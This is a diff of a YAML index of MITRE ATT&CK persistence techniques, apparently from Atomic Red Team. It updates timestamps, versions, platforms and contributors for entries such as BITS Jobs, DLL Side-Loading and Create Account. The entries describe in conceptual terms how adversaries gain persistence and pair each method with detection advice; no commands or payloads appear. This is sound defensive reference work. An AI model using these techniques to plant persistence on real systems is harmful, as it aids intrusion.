       name: 'Hijack Execution Flow: Path Interception by Unquoted Path'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
@@ -33958,7 +34363,6 @@ persistence:
         url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1574.009
     atomic_tests: []
   T1037.005:
@@ -34002,7 +34406,7 @@ persistence:
         mechanism.(Citation: Methods of Mac Malware Persistence) Additionally, since
         StartupItems run during the bootup phase of macOS, they will run as the elevated
         root user."
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T16:43:21.560Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Boot or Logon Initialization Scripts: Startup Items'
       x_mitre_detection: |-
@@ -34024,7 +34428,6 @@ persistence:
       - Administrator
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1037.005
     atomic_tests: []
   T1078.002:
@@ -34105,7 +34508,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1037.003:
     technique:
@@ -34128,7 +34530,7 @@ persistence:
         description: Daniel Petri. (2009, January 8). Setting up a Logon Script through
           Active Directory Users and Computers in Windows Server 2008. Retrieved November
           15, 2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-24T23:45:25.625Z'
       name: Network Logon Script
       description: "Adversaries may use network logon scripts automatically executed
         at logon initialization to establish persistence. Network logon scripts can
@@ -34158,12 +34560,10 @@ persistence:
       - 'File: File Modification'
       - 'Process: Process Creation'
       - 'File: File Creation'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1197:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:21:40.927Z'
       name: BITS Jobs
       description: |-
         Adversaries may abuse BITS jobs to persistently execute code and perform various background tasks. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM).(Citation: Microsoft COM)(Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.
@@ -34253,12 +34653,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1197
     atomic_tests: []
   T1546.010:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:33:45.568Z'
       name: 'Event Triggered Execution: AppInit DLLs'
       description: "Adversaries may establish persistence and/or elevate privileges
         by executing malicious content triggered by AppInit DLLs loaded into processes.
@@ -34343,7 +34742,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.010
     atomic_tests: []
   T1546.002:
@@ -34408,18 +34806,17 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.002
     atomic_tests: []
   T1556.009:
     technique:
-      modified: '2024-04-18T20:53:46.175Z'
+      modified: '2024-09-16T16:54:47.595Z'
       name: Conditional Access Policies
       description: "Adversaries may disable or modify conditional access policies
         to enable persistent access to compromised accounts. Conditional access policies
         are additional verifications used by identity providers and identity and access
         management systems to determine whether a user should be granted access to
-        a resource.\n\nFor example, in Azure AD, Okta, and JumpCloud, users can be
+        a resource.\n\nFor example, in Entra ID, Okta, and JumpCloud, users can be
         denied access to applications based on their IP address, device enrollment
         status, and use of multi-factor authentication.(Citation: Microsoft Conditional
         Access)(Citation: JumpCloud Conditional Access Policies)(Citation: Okta Conditional
@@ -34452,10 +34849,9 @@ persistence:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Azure AD
-      - SaaS
       - IaaS
-      x_mitre_version: '1.0'
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Modification'
       - 'Cloud Service: Cloud Service Modification'
@@ -34492,7 +34888,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1543.001:
     technique:
@@ -34566,7 +34961,7 @@ persistence:
         benign software. Launch Agents are created with user level privileges and
         execute with user level permissions.(Citation: OSX Malware Detection)(Citation:
         OceanLotus for OS X) "
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-21T16:13:00.598Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Create or Modify System Process: Launch Agent'
       x_mitre_detection: "Monitor Launch Agent creation through additional plist files
@@ -34594,12 +34989,11 @@ persistence:
       - User
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1543.001
     atomic_tests: []
   T1505:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-19T21:18:29.349Z'
       name: Server Software Component
       description: 'Adversaries may abuse legitimate extensible development features
         of servers to establish persistent access to systems. Enterprise server applications
@@ -34658,33 +35052,10 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1556.001:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
-      type: attack-pattern
-      created: '2020-02-11T19:05:02.399Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.001
-        url: https://attack.mitre.org/techniques/T1556/001
-      - source_name: Dell Skeleton
-        description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
-          Retrieved April 8, 2019.
-        url: https://www.secureworks.com/research/skeleton-key-malware-analysis
-      - url: https://technet.microsoft.com/en-us/library/dn487457.aspx
-        description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
-          June 3, 2016.
-        source_name: TechNet Audit Policy
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-08-21T15:26:54.386Z'
       name: Domain Controller Authentication
       description: "Adversaries may patch the authentication process on a domain controller
         to bypass the typical authentication mechanisms and enable access to accounts.
@@ -34705,6 +35076,7 @@ persistence:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor for calls to <code>OpenProcess</code> that can be
         used to manipulate lsass.exe running on a domain controller as well as for
         malicious modifications to functions exported from authentication-related
@@ -34719,52 +35091,42 @@ persistence:
         used to execute binaries on a remote system as a particular account. Correlate
         other security systems with login information (e.g. a user has an active login
         session but has not entered the building or does not have VPN access). "
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Process: Process Access'
       - 'File: File Modification'
       - 'Process: OS API Execution'
-      x_mitre_permissions_required:
-      - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
-    atomic_tests: []
-  T1556.005:
-    technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
       type: attack-pattern
-      created: '2022-01-13T20:02:28.349Z'
+      id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
+      created: '2020-02-11T19:05:02.399Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1556.005
-        url: https://attack.mitre.org/techniques/T1556/005
-      - source_name: store_pwd_rev_enc
-        url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
-        description: Microsoft. (2021, October 28). Store passwords using reversible
-          encryption. Retrieved January 3, 2022.
-      - source_name: how_pwd_rev_enc_1
-        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
-        description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
-          encryption: how it works (part 1). Retrieved November 17, 2021.'
-      - source_name: how_pwd_rev_enc_2
-        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
-        description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
-          encryption: how it works (part 2). Retrieved November 17, 2021.'
-      - source_name: dump_pwd_dcsync
-        url: https://adsecurity.org/?p=2053
-        description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
-          All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
-      modified: '2022-05-11T14:00:00.188Z'
+        url: https://attack.mitre.org/techniques/T1556/001
+        external_id: T1556.001
+      - source_name: Dell Skeleton
+        description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
+          Retrieved April 8, 2019.
+        url: https://www.secureworks.com/research/skeleton-key-malware-analysis
+      - source_name: TechNet Audit Policy
+        description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
+          June 3, 2016.
+        url: https://technet.microsoft.com/en-us/library/dn487457.aspx
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1556.005:
+    technique:
+      modified: '2024-08-26T15:40:31.871Z'
       name: Reversible Encryption
       description: |-
         An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The <code>AllowReversiblePasswordEncryption</code> property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it.(Citation: store_pwd_rev_enc)
@@ -34786,6 +35148,7 @@ persistence:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor property changes in Group Policy: <code>Computer
         Configuration\\Windows Settings\\Security Settings\\Account Policies\\Password
         Policy\\Store passwords using reversible encryption</code>. By default, the
@@ -34796,23 +35159,50 @@ persistence:
         Directory PowerShell modules, such as <code>Set-ADUser</code> and <code>Set-ADAccountControl</code>,
         that change account configurations. \n\nMonitor Fine-Grained Password Policies
         and regularly audit user accounts and group settings.(Citation: dump_pwd_dcsync)"
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Modification'
       - 'Command: Command Execution'
       - 'User Account: User Account Metadata'
       - 'Script: Script Execution'
-      x_mitre_permissions_required:
-      - User
-      - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
+      created: '2022-01-13T20:02:28.349Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/005
+        external_id: T1556.005
+      - source_name: dump_pwd_dcsync
+        description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
+          All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
+        url: https://adsecurity.org/?p=2053
+      - source_name: store_pwd_rev_enc
+        description: Microsoft. (2021, October 28). Store passwords using reversible
+          encryption. Retrieved January 3, 2022.
+        url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
+      - source_name: how_pwd_rev_enc_1
+        description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
+          encryption: how it works (part 1). Retrieved November 17, 2021.'
+        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
+      - source_name: how_pwd_rev_enc_2
+        description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
+          encryption: how it works (part 2). Retrieved November 17, 2021.'
+        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1546.016:
     technique:
-      modified: '2024-04-12T02:23:44.583Z'
+      modified: '2024-04-28T15:52:44.332Z'
       name: Installer Packages
       description: |-
         Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Installer packages are OS specific and contain the resources an operating system needs to install applications on a system. Installer packages can include scripts that run prior to installation as well as after installation is complete. Installer scripts may inherit elevated permissions when executed. Developers often use these scripts to prepare the environment for installation, check requirements, download dependencies, and remove files after installation.(Citation: Installer Package Scripting Rich Trouton)
@@ -34829,7 +35219,7 @@ persistence:
         phase_name: persistence
       x_mitre_contributors:
       - Brandon Dalton @PartyD0lphin
-      - Alexander Rodchenko
+      - Rodchenko Aleksandr
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -34888,7 +35278,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1037.004:
     technique:
@@ -34970,7 +35359,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1037.004
     atomic_tests: []
   T1543.002:
@@ -35085,12 +35473,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1543.002
     atomic_tests: []
   T1136:
     technique:
-      modified: '2024-01-31T20:46:43.215Z'
+      modified: '2024-10-15T15:53:21.895Z'
       name: Create Account
       description: |-
         Adversaries may create an account to maintain access to victim systems.(Citation: Symantec WastedLocker June 2020) With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
@@ -35113,16 +35500,15 @@ persistence:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Network
       - Containers
       - SaaS
-      x_mitre_version: '2.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.5'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Command: Command Execution'
@@ -35149,7 +35535,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1547.013:
     technique:
@@ -35218,7 +35603,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1547.007:
     technique:
@@ -35254,7 +35638,7 @@ persistence:
         Adversaries may modify plist files to automatically run an application when a user logs in. When a user logs out or restarts via the macOS Graphical User Interface (GUI), a prompt is provided to the user with a checkbox to "Reopen windows when logging back in".(Citation: Re-Open windows on Mac) When selected, all applications currently open are added to a property list file named <code>com.apple.loginwindow.[UUID].plist</code> within the <code>~/Library/Preferences/ByHost</code> directory.(Citation: Methods of Mac Malware Persistence)(Citation: Wardle Persistence Chapter) Applications listed in this file are automatically reopened upon the user’s next logon.
 
         Adversaries can establish [Persistence](https://attack.mitre.org/tactics/TA0003) by adding a malicious application path to the <code>com.apple.loginwindow.[UUID].plist</code> file to execute payloads when a user logs in.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T23:46:56.443Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Boot or Logon Autostart Execution: Re-opened Applications'
       x_mitre_detection: Monitoring the specific plist files associated with reopening
@@ -35273,12 +35657,11 @@ persistence:
       - User
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.007
     atomic_tests: []
   T1574.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:47.241Z'
       name: 'Hijack Execution Flow: DLL Side-Loading'
       description: |-
         Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
@@ -35328,12 +35711,11 @@ persistence:
         url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1574.002
     atomic_tests: []
   T1098.002:
     technique:
-      modified: '2024-01-03T15:46:06.706Z'
+      modified: '2024-10-15T15:37:25.303Z'
       name: 'Account Manipulation: Additional Email Delegate Permissions'
       description: "Adversaries may grant additional permission levels to maintain
         persistent access to an adversary-controlled email account. \n\nFor example,
@@ -35366,9 +35748,10 @@ persistence:
       x_mitre_contributors:
       - Microsoft Detection and Response Team (DART)
       - Mike Burns, Mandiant
-      - Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)
       - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
       - Arad Inbar, Fidelis Security
+      - Nilesh Dherange (Gurucul)
+      - Naveen Vijayaraghavan
       x_mitre_deprecated: false
       x_mitre_detection: "Monitor for unusual Exchange and Office 365 email account
         permissions changes that may indicate excessively broad permissions being
@@ -35385,9 +35768,8 @@ persistence:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      - Office 365
-      - Google Workspace
-      x_mitre_version: '2.1'
+      - Office Suite
+      x_mitre_version: '2.2'
       x_mitre_data_sources:
       - 'Group: Group Modification'
       - 'Application Log: Application Log Content'
@@ -35433,7 +35815,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098.002
     atomic_tests:
     - name: EXO - Full access mailbox permission granted to a user
@@ -35489,7 +35870,7 @@ persistence:
         elevation_required: false
   T1653:
     technique:
-      modified: '2023-09-30T21:28:45.038Z'
+      modified: '2024-10-16T20:11:40.334Z'
       name: Power Settings
       description: |-
         Adversaries may impair a system's ability to hibernate, reboot, or shut down in order to extend access to infected machines. When a computer enters a dormant state, some or all software and hardware may cease to operate which can disrupt malicious activity.(Citation: Sleep, shut down, hibernate)
@@ -35503,7 +35884,7 @@ persistence:
       - kill_chain_name: mitre-attack
         phase_name: persistence
       x_mitre_contributors:
-      - Goldstein Menachem
+      - Menachem Goldstein
       - Juan Tapiador
       x_mitre_deprecated: false
       x_mitre_detection: "Command-line invocation of tools capable of modifying services
@@ -35562,7 +35943,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1037.001:
     technique:
@@ -35588,7 +35968,7 @@ persistence:
         url: http://www.hexacorn.com/blog/2014/11/14/beyond-good-ol-run-key-part-18/
         description: Hexacorn. (2014, November 14). Beyond good ol’ Run key, Part
           18. Retrieved November 15, 2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-24T23:45:03.153Z'
       name: 'Boot or Logon Initialization Scripts: Logon Script (Windows)'
       description: "Adversaries may use Windows logon scripts automatically executed
         at logon initialization to establish persistence. Windows allows logon scripts
@@ -35614,13 +35994,11 @@ persistence:
       - 'Command: Command Execution'
       - 'Process: Process Creation'
       - 'Windows Registry: Windows Registry Key Creation'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1037.001
     atomic_tests: []
   T1137.002:
     technique:
-      modified: '2024-04-16T12:41:55.175Z'
+      modified: '2024-10-15T16:01:48.325Z'
       name: 'Office Application Startup: Office Test'
       description: |-
         Adversaries may abuse the Microsoft Office "Office Test" Registry key to obtain persistence on a compromised system. An Office Test Registry location exists that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started. This Registry key is thought to be used by Microsoft to load DLLs for testing and debugging purposes while developing Office applications. This Registry key is not created by default during an Office installation.(Citation: Hexacorn Office Test)(Citation: Palo Alto Office Test Sofacy)
@@ -35644,8 +36022,8 @@ persistence:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      - Office 365
-      x_mitre_version: '1.2'
+      - Office Suite
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Creation'
       - 'Command: Command Execution'
@@ -35675,7 +36053,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1137.002
     atomic_tests: []
   T1547.008:
@@ -35718,7 +36095,7 @@ persistence:
         Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.(Citation: Microsoft Security Subsystem)
 
         Adversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute malicious payloads.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T16:34:43.405Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Boot or Logon Autostart Execution: LSASS Driver'
       x_mitre_detection: "With LSA Protection enabled, monitor the event logs (Events
@@ -35743,12 +36120,11 @@ persistence:
       - Administrator
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.008
     atomic_tests: []
   T1078.004:
     technique:
-      modified: '2024-03-29T15:42:13.499Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Valid Accounts: Cloud Accounts'
       description: "Valid accounts in cloud environments may allow adversaries to
         perform actions to achieve Initial Access, Persistence, Privilege Escalation,
@@ -35788,8 +36164,10 @@ persistence:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Jon Sternstein, Stern Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
         or malicious behavior, such as accessing information outside of the normal
@@ -35797,13 +36175,13 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
-      x_mitre_version: '1.7'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.8'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Logon Session: Logon Session Metadata'
@@ -35834,17 +36212,14 @@ persistence:
         url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.004
     atomic_tests: []
   T1053.002:
     technique:
-      modified: '2023-11-15T14:38:10.876Z'
+      modified: '2024-10-12T15:53:12.333Z'
       name: 'Scheduled Task/Job: At'
       description: |-
-        Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group.
+        Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. In addition to explicitly running the `at` command, adversaries may also schedule a task with [at](https://attack.mitre.org/software/S0110) by directly leveraging the [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) `Win32_ScheduledJob` WMI class.(Citation: Malicious Life by Cybereason)
 
         On Linux and macOS, [at](https://attack.mitre.org/software/S0110) may be invoked by the superuser as well as any users added to the <code>at.allow</code> file. If the <code>at.allow</code> file does not exist, the <code>at.deny</code> file is checked. Every username not listed in <code>at.deny</code> is allowed to invoke [at](https://attack.mitre.org/software/S0110). If the <code>at.deny</code> exists and is empty, global use of [at](https://attack.mitre.org/software/S0110) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://attack.mitre.org/software/S0110).(Citation: Linux at)
 
@@ -35907,7 +36282,7 @@ persistence:
       - Windows
       - Linux
       - macOS
-      x_mitre_version: '2.2'
+      x_mitre_version: '2.3'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Scheduled Job: Scheduled Job Creation'
@@ -35941,8 +36316,8 @@ persistence:
         url: https://man7.org/linux/man-pages/man1/at.1p.html
       - source_name: Twitter Leoloobeek Scheduled Task
         description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
-          December 12, 2017.
-        url: https://twitter.com/leoloobeek/status/939248813465853953
+          September 12, 2024.
+        url: https://x.com/leoloobeek/status/939248813465853953
       - source_name: Microsoft Scheduled Task Events Win10
         description: Microsoft. (2017, May 28). Audit Other Object Access Events.
           Retrieved June 27, 2019.
@@ -35951,6 +36326,10 @@ persistence:
         description: Microsoft. (n.d.). General Task Registration. Retrieved December
           12, 2017.
         url: https://technet.microsoft.com/library/dd315590.aspx
+      - source_name: Malicious Life by Cybereason
+        description: Philip Tsukerman. (n.d.). No Win32 Process Needed | Expanding
+          the WMI Lateral Movement Arsenal. Retrieved June 19, 2024.
